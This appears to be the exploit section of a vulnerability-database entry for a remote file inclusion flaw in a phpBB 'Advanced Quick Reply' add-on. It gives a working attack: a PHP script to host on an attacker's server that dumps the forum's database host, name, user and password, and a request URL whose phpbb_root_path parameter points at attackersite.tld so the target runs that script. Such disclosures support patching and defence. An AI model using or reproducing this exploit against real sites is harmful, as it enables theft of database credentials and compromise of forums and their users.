• info
• discussion
• exploit
• solution
• references

PHPBB Advanced Quick Reply Hack Remote File Include Vulnerability

Create the following malicious script (extension.inc) and host it on a webserver:

<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>

Then submit the following request to the host running the vulnerable software:

http://www.example.com/quick_reply.php?phpbb_root_path=http://attackersite.tld/&mode=smilies